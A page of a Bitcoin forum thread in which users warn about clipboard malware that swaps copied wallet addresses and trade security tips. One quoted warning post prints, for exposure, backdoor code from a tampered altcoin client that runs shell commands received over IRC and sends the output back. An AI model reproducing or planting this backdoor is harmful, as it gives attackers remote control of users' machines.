Bitcoin Forum
October 18, 2018, 11:37:22 PM *
News: Make sure you are not using versions of Bitcoin Core other than 0.17.0 [Torrent], 0.16.3, 0.15.2, or 0.14.3. More info.
 
   Home   Help Search Donate Login Register  
Pages: « 1 2 [3] 4 »  All
  Print  
Author Topic: Bitcoin Malware  (Read 3787 times)
NeuroticFish
Legendary
*
Offline Offline

Activity: 1638
Merit: 1071


The real one is http://bitcoin.ORG


View Profile WWW
September 01, 2015, 11:43:53 AM
 #41

Chrome is the malware.


it seems logical ...  Grin

You made me doublecheck Smiley
As usual, the malware seems to be using names quite similar with known software.
The normal browser is chrome.exe, not chrome32.
I guess that the same story goes to acrobat reader too, but since I don't use it I cannot check.


But really, the ones who run windoze with no antivirus on... they just ask for it.

.BITSLER.                 ▄███
               ▄████▀
             ▄████▀
           ▄████▀  ▄██▄
         ▄████▀    ▀████▄
       ▄████▀        ▀████▄
     ▄████▀            ▀████▄
   ▄████▀                ▀████▄
 ▄████▀ ▄████▄      ▄████▄ ▀████▄
█████   ██████      ██████   █████
 ▀████▄ ▀████▀      ▀████▀ ▄████▀
   ▀████▄                ▄████▀
     ▀████▄            ▄████▀
       ▀████▄        ▄████▀
         ▀████▄    ▄████▀
           ▀████▄▄████▀
             ▀██████▀
               ▀▀▀▀
▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▄            
▄▄▄▄▀▀▀▀    ▄▄█▄▄ ▀▀▄         
▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▄      
█  ▀▄▄  ▀█▀▀ ▄      ▀████   ▀▀▄   
█ █▄  ▀▄   ▀████       ▀▀ ▄██▄ ▀▀▄
▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
█  ▀▀       ▀▄▄ ▀████      ▄▄▄▀▀▀  █
█            ▄ ▀▄    ▄▄▄▀▀▀   ▄▄  █
▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
█ ▄▄   ███   ▀██  █           ▀▀  █ 
█ ███  ▀██       █        ▄▄      █ 
▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀  
▀▄            █        ▀▀      █  
▀▀▄   ███▄  █   ▄▄          █   
▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀    
▀▀▄   █   ▀▀▄▄▄▀▀▀         
▄▄▄▄▄▄▄▄▄▄▄█▄▄▀▀▀▀              
              ▄▄▄██████▄▄▄
          ▄▄████████████████▄▄
        ▄██████▀▀▀▀▀▀▀▀▀▀██████▄
▄     ▄█████▀             ▀█████▄
██▄▄ █████▀                ▀█████
 ████████            ▄██      █████
  ████████▄         ███▀       ████▄
  █████████▀▀     ▄███▀        █████
   █▀▀▀          █████         █████
     ▄▄▄         ████          █████
   █████          ▀▀           ████▀
    █████                     █████
     █████▄                 ▄█████
      ▀█████▄             ▄█████▀
        ▀██████▄▄▄▄▄▄▄▄▄▄██████▀
          ▀▀████████████████▀▀
              ▀▀▀██████▀▀▀
            ▄▄▄███████▄▄▄
         ▄█▀▀▀ ▄▄▄▄▄▄▄ ▀▀▀█▄
       █▀▀ ▄█████████████▄ ▀▀█
     █▀▀ ███████████████████ ▀▀█
    █▀ ███████████████████████ ▀█
   █▀ ███████████████▀▀ ███████ ▀█
 ▄█▀ ██████████████▀      ▀█████ ▀█▄
███ ███████████▀▀            ▀▀██ ███
███ ███████▀▀                     ███
███ ▀▀▀▀                          ███
▀██▄                             ▄██▀
  ▀█▄                            ▀▀
    █▄       █▄▄▄▄▄▄▄▄▄█
     █▄      ▀█████████▀
      ▀█▄      ▀▀▀▀▀▀▀
        ▀▀█▄▄  ▄▄▄
            ▀▀█████
[]
1539905842
Hero Member
*
Offline Offline

Posts: 1539905842

View Profile Personal Message (Offline)

Ignore
1539905842
Reply with quote  #2

1539905842
Report to moderator
Advertised sites are not endorsed by the Bitcoin Forum. They may be unsafe, untrustworthy, or illegal in your jurisdiction. Advertise here.
medUSA
Legendary
*
Offline Offline

Activity: 952
Merit: 1003


--Signature Designs-- http://bit.ly/1Pjbx77


View Profile WWW
September 01, 2015, 11:53:15 AM
 #42

As bitcoin grows in popularity, more of these malware will creep up to steal your coins. I believe a dedicated machine (PC or phone) for bitcoin with nothing else installed is the only way out of this. If these malware replaces bitcoin address while we copy and paste, even hardware wallets are vulnerable. Embarrassed
Carlton Banks
Legendary
*
Offline Offline

Activity: 2156
Merit: 1377



View Profile
September 01, 2015, 11:56:10 AM
 #43

Linux.

No anti-this and anti-that software. Ditch Windows and use Linux, you'll avoid most of these types of attacks.

or simply don't download random stuff from the web, problem solved, i still have my hot wallet intact, since years, and no malware has stole anything from my desktop

malware do not infect your pc without you doing something wrong

Feeling confident about opening .pdfs? Or browsing unknown websites?

I've only got 1 PC (well, and a Raspberry Pi), it seems like overkill to have a separate PC just for bitcoin, but I guess it's been successful in keeping your coins safe.

If these malware replaces bitcoin address while we copy and paste, even hardware wallets are vulnerable. Embarrassed

Not with the Trezor hardware wallet. It has a screen that displays the address you're sending to before you sign the transaction.

Vires in numeris
lite
Legendary
*
Offline Offline

Activity: 1372
Merit: 1008


View Profile
September 01, 2015, 12:21:57 PM
 #44

Linux is the best if you want protection against malware. Also if you're doing larger transaction it's recommended to use live Linux OS from your USB. I prefer to use Ubuntu, but there are lots of other Linux OS one can choose. Wink
mallard
Full Member
***
Offline Offline

Activity: 196
Merit: 100


View Profile
September 01, 2015, 12:22:58 PM
 #45

Do any of the popular virus scanners detect this?
XCASH
Hero Member
*****
Offline Offline

Activity: 775
Merit: 1000


View Profile
September 01, 2015, 12:40:46 PM
 #46

Do any of the popular virus scanners detect this?

I don't know, but you can't always rely on virus scanners to detect something. The quote below is stickied at the top of the alt coin board, but some of it also applies to Bitcoin. Hackers can make crypted malware that virus scanners don't detect.

Also hackers can code apparently useful legit software that uses such simple techniques to steal wallets that it goes undetected by virus scanners. It's obvious from the source code that there's wallet stealing code there, but very few people read source code before using software.






In the past months, malware infection attempts on this forum has become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans is no longer sufficient to ensure safety.

"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly.

Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).

Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link.

Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.

Packed/FUD executables
In most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:
Code:
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
CFree(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
}
}
here is the source code with macros resolved:
Code:
if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
pclose(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
}
}
The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.
nero987
Sr. Member
****
Offline Offline

Activity: 258
Merit: 250



View Profile
September 01, 2015, 12:41:39 PM
 #47

Do any of the popular virus scanners detect this?

If the particular version of the malware you received is not yet flagged by your av: No it doesn't.

This is arround for some time already...
It first came up on Evo market arround 1 month before the exit scam.
I have the source code of v1.3 here.
Before you compile the malware you set some parameters, which include the process name.
In Snorek's "examples" its Chrome32.exe or AcroRd32.exe, but it can be literally everything.

About anti malware:
The program does not make any connection to the internet, for this reason it is almost never picked up by anti-virus/malware software.
When a particular compilation of the malware (with particular process name) is reported to an antivirus database, only that version will be picked up by av's...
There are some av's that notice that part of the code is comparable to know malware, but thats only a minority of the av's....


damn, practice your english nero!

edit: I'm not selling/sharing the source code, neither sharing any detailled information how it actually works!

So can someone tell me what the source of the malware is? Is it something that infects chrome? In that case im safe? I use Mozilla firefox. Thanks for the heads up anyway.

It has nothing to do with chrome itself. The first version of this malware that was sold advised to use "chrome.exe" as process name, because it would look least suspicious (as long as you do have chrome on your pc Tongue).
Meanwhile there are dozens of "new" versions of this malware with other process names then "chrome.exe".
This malware is mostly injected in a pdf!

The copied address gets replaced 5-15% of the times an adress is copied.
The first 3-6 characters of the "new" address will be the same as the first characters of the originally copied address.

It is hard to get picked up by av's just because the malware doesn't connect to the internet...
wearehatetherules
Full Member
***
Offline Offline

Activity: 196
Merit: 100

★YoBit.Net★ 200+ Coins Exchange & Dice


View Profile
September 05, 2015, 04:45:40 AM
 #48

i never heard before about this,it that reallly exist?

ranochigo
Legendary
*
Offline Offline

Activity: 1568
Merit: 1094

Somewhat inactive.


View Profile WWW
September 05, 2015, 07:24:56 AM
 #49

So can someone tell me what the source of the malware is? Is it something that infects chrome? In that case im safe? I use Mozilla firefox. Thanks for the heads up anyway.

It has nothing to do with chrome itself. The first version of this malware that was sold advised to use "chrome.exe" as process name, because it would look least suspicious (as long as you do have chrome on your pc Tongue).
Meanwhile there are dozens of "new" versions of this malware with other process names then "chrome.exe".
This malware is mostly injected in a pdf!

The copied address gets replaced 5-15% of the times an adress is copied.
The first 3-6 characters of the "new" address will be the same as the first characters of the originally copied address.

It is hard to get picked up by av's just because the malware doesn't connect to the internet...
Antiviruses usually check the application's signature and match it against their database. If it matches, the antivirus would flag it. This would require you to have the latest database download. I have to say the virus would be quite intensive to carry out on a large scale. If the address gets replaced with an address that has a first few address identical to it, they need to generate a large amount of vanity addresses or even use the victim's computer to generate one and send the private key to the server. This has to be done in a fast pace unless a fake lag can be implemented when the address is being paste.

Antivirus won't be foolproof and people can use crypter to avoid detections by antiviruses.

Hopalong
Member
**
Offline Offline

Activity: 98
Merit: 10


View Profile
September 05, 2015, 08:20:01 AM
 #50

i would love to use linux but my wifi stick doesnt have the drivers for linux

I bet there are drivers around. Sometimes you have to search to find out what hardware you have and not what it is labeled with.

On my reserve laptop the wifi use intel drivers in windows but it was produced by broadcom so i had to get broadcom drivers to get it working in linux.


About linux security...   I have an old laptop with ubuntu.  It is formated corectly with a partisjon for each user level and cryptated. I have lost the password and it is impossible to get in. No live cd can start and it is no way to get to the disks. Even a mini linux on a usb stick cant read the disks.
mallard
Full Member
***
Offline Offline

Activity: 196
Merit: 100


View Profile
September 05, 2015, 09:19:04 AM
 #51

i would love to use linux but my wifi stick doesnt have the drivers for linux

I bet there are drivers around. Sometimes you have to search to find out what hardware you have and not what it is labeled with.

On my reserve laptop the wifi use intel drivers in windows but it was produced by broadcom so i had to get broadcom drivers to get it working in linux.


About linux security...   I have an old laptop with ubuntu.  It is formated corectly with a partisjon for each user level and cryptated. I have lost the password and it is impossible to get in. No live cd can start and it is no way to get to the disks. Even a mini linux on a usb stick cant read the disks.

Do you need to recover the files, or do you just want the laptop working again?
You should be able to just use a program like dd to clear out the disk, and then you will be able to install an operating system again.
RealBitcoin
Hero Member
*****
Offline Offline

Activity: 854
Merit: 1000


JAYCE DESIGNS - http://bit.ly/1tmgIwK


View Profile
September 05, 2015, 01:12:30 PM
 #52

Linux.

No anti-this and anti-that software. Ditch Windows and use Linux, you'll avoid most of these types of attacks.
If you are looking for a linux version that has a windows feel I suggest Linux Mint, you can use wine for most windows programs but games have a lot of compatibility issues.

Don't forget linux is free :http://www.linuxmint.com/

Is linuxmint more secure than ubuntu?

What are the differences between the 2?

What about keyloggers, webcam trojans, clipboard stealers, kernel malware and screen capture malware?

Hopalong
Member
**
Offline Offline

Activity: 98
Merit: 10


View Profile
September 05, 2015, 01:56:06 PM
 #53

i would love to use linux but my wifi stick doesnt have the drivers for linux

I bet there are drivers around. Sometimes you have to search to find out what hardware you have and not what it is labeled with.

On my reserve laptop the wifi use intel drivers in windows but it was produced by broadcom so i had to get broadcom drivers to get it working in linux.


About linux security...   I have an old laptop with ubuntu.  It is formated corectly with a partisjon for each user level and cryptated. I have lost the password and it is impossible to get in. No live cd can start and it is no way to get to the disks. Even a mini linux on a usb stick cant read the disks.

Do you need to recover the files, or do you just want the laptop working again?
You should be able to just use a program like dd to clear out the disk, and then you will be able to install an operating system again.

Everything important was backed up on an external disk so my data was safe. I have not checked if gparted can read the partisions yet but i think it should. I do have a bit of fun trying to get acces to the disks.

I have tried to secure a disk in windows but every live cd was able to read it. Dont get why linux is so much better at this.
mallard
Full Member
***
Offline Offline

Activity: 196
Merit: 100


View Profile
September 05, 2015, 02:59:38 PM
 #54

Linux.

No anti-this and anti-that software. Ditch Windows and use Linux, you'll avoid most of these types of attacks.
If you are looking for a linux version that has a windows feel I suggest Linux Mint, you can use wine for most windows programs but games have a lot of compatibility issues.

Don't forget linux is free :http://www.linuxmint.com/

Is linuxmint more secure than ubuntu?

What are the differences between the 2?

What about keyloggers, webcam trojans, clipboard stealers, kernel malware and screen capture malware?

Linux Mint is based on Ubuntu.
There isn't much difference between the two.
confirmation120
Full Member
***
Offline Offline

Activity: 224
Merit: 100



View Profile
September 05, 2015, 04:22:56 PM
 #55

i recently found a malware that changes bitcoin addresses when copied to the hackers address so just watch out and check to make sure that the bitcoin address you copy comes out the same when you paste it  Smiley
Didn't know this kind of malware exists. I need to check and scan my laptop right away after reading this
seVell
Newbie
*
Offline Offline

Activity: 28
Merit: 0


View Profile
September 09, 2015, 11:40:38 PM
 #56

i recently found a malware that changes bitcoin addresses when copied to the hackers address so just watch out and check to make sure that the bitcoin address you copy comes out the same when you paste it  Smiley

it is safer to store your coins on a hardware wallet:

https://bitcointalk.org/index.php?topic=899253.0

Doesn't this malware work even if you use a Trezor for example? I guess that people should be always careful and double check. MyTrezor Web wallet works in the browser as well.

The truth of the matter is that everybody should be double checking are addresses changed. If anybody  can have a copy of this malware for a $1, this means that this malware can become very widespread.

Not to mention that you have to trust the hardware manufacturer and the seller and probably other middle-mans.
Remember remember the 5th of November
Legendary
*
Offline Offline

Activity: 1764
Merit: 1001

Reverse engineer from time to time


View Profile
September 10, 2015, 01:23:53 AM
 #57

Chrome is the malware.


it seems logical ...  Grin

You made me doublecheck Smiley
As usual, the malware seems to be using names quite similar with known software.
The normal browser is chrome.exe, not chrome32.
I guess that the same story goes to acrobat reader too, but since I don't use it I cannot check.


But really, the ones who run windoze with no antivirus on... they just ask for it.
That's very clever. Since Chrome spawns multiple instances of itself, it can be very easy to disguise a process with the same name, nobody will be any wiser.

BTC:1AiCRMxgf1ptVQwx6hDuKMu4f7F27QmJC2
Kakmakr
Legendary
*
Offline Offline

Activity: 1442
Merit: 1128

★ ChipMixer | Bitcoin mixing service ★


View Profile
September 10, 2015, 06:02:30 AM
 #58

Just check the address after you pasted it, and you would be fine.  Wink I have 1 FREE anti-virus software package and 1 Full commercial version installed on one computer, and I have had no problems at all so far. < Avast & Kaspersky > Luckily these two has not clashed, because they usually do.

Keep some honey traps around to trigger flags when possible hacks are being done on you. <Small amounts of coins in wallets, easily accessible> When they are empty and you have not done that, you know you are compromised.   

Q7
Sr. Member
****
Offline Offline

Activity: 448
Merit: 250


View Profile WWW
September 10, 2015, 10:14:42 AM
 #59

If you can afford it, get two pc. I have with myself one with a lower spec which is connected to the internet all the time and i even use it for installing untrusted new software. The other one is basically most of the time offline and no other software installed in it except browsers, together with my hot wallet

pooya87
Legendary
*
Offline Offline

Activity: 1428
Merit: 1203


Buy bitcoin they said... who listened?


View Profile
September 10, 2015, 11:50:28 AM
 #60

If you can afford it, get two pc. I have with myself one with a lower spec which is connected to the internet all the time and i even use it for installing untrusted new software. The other one is basically most of the time offline and no other software installed in it except browsers, together with my hot wallet


you don't need to spend that much in order to have a secure environment that you can safely install and use a bitcoin wallet.
all you need is a USB disk which is super cheep , and linux that you can download free (like Ubuntu).

1) make persistent live linux on the USB disk
2) change a couple of settings so that it would never connect to network.
3) install your favorite bitcoin wallet

**) don't forget to check the signature of both linux and bitcoin wallet

Pages: « 1 2 [3] 4 »  All
  Print  
 
Jump to:  

Sponsored by , a Bitcoin-accepting VPN.
Powered by MySQL Powered by PHP Powered by SMF 1.1.19 | SMF © 2006-2009, Simple Machines Valid XHTML 1.0! Valid CSS!